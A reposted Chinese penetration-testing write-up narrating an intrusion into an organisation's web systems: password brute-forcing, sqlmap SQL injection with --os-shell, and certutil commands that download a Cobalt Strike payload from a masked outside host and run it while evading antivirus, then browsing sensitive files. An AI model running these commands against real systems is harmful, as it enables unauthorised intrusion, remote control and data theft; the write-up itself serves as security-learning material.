现在只对常读和星标的公众号才展示大图推送，建议大家能把潇湘信安“设为星标”，否则可能看不到了...！

0x00 前言

某某公司为YouDianCMS（可能存在注入）。某集团OA，使用的是通达OA。某管理系统，存在登录框，无验证码。某监控管理系统，存在登录框，无验证码。某收费系统，使用的是若依管理系统。

习惯性先试一下通达OA，通达OA的利用工具比较方便，若存在漏洞可以一键getshell，不过利用失败了。

之前收集的youdianCMS的sql注入的POC，直接利用，但是还是不存在该漏洞。

1）测试默认口令：admin/admin123，失败。

爆破密码。爆出来了弱口令admin/456123，但是登录进去后找了一圈没有geshell的点，一个弱口令肯定没法交差。

sqlmap.py -r 1.txt --dbs --random-agent --proxy=http://127.0.0.1:7890

sqlmap.py -r 1.txt --os-shell --random-agent --proxy=http://127.0.0.1:7890

本来想着已经成功了，接下来的拿shell就水到渠成，没想到又曲折了一番。

CS直接生成powershell命令，然后令目标系统执行，执行完毕一直没上线，然后想着让sqlmap回显一下看看有什么问题，等了十几分钟页面才回显完，应该是有杀软，页面返回的是“检测到该命令为危险命令”，就给拦截了。

certutil -urlcache -split -f http://xx.xx.xx.xx/cs.exe dll.exe

dll.exe

最后想了想是不是该目录下没有权限，于是在目标系统的D盘新建一个dll文件夹，然后把免杀马写到这里。

certutil -urlcache -split -f http://xx.xx.xx.xx/cs.exe d:\dll\dll.exe

d:\dll\dll.exe

看一下目标机器有哪些敏感文件可利用，收获颇丰呀。

之前做渗透每次遇到登录框都比较头疼，因为登录框可利用的点比较少，也没在登录框上挖到过什么大的漏洞，但是本次运气还是比较好的，总算可以交差了。

文章转载自公众号：星海安全实验室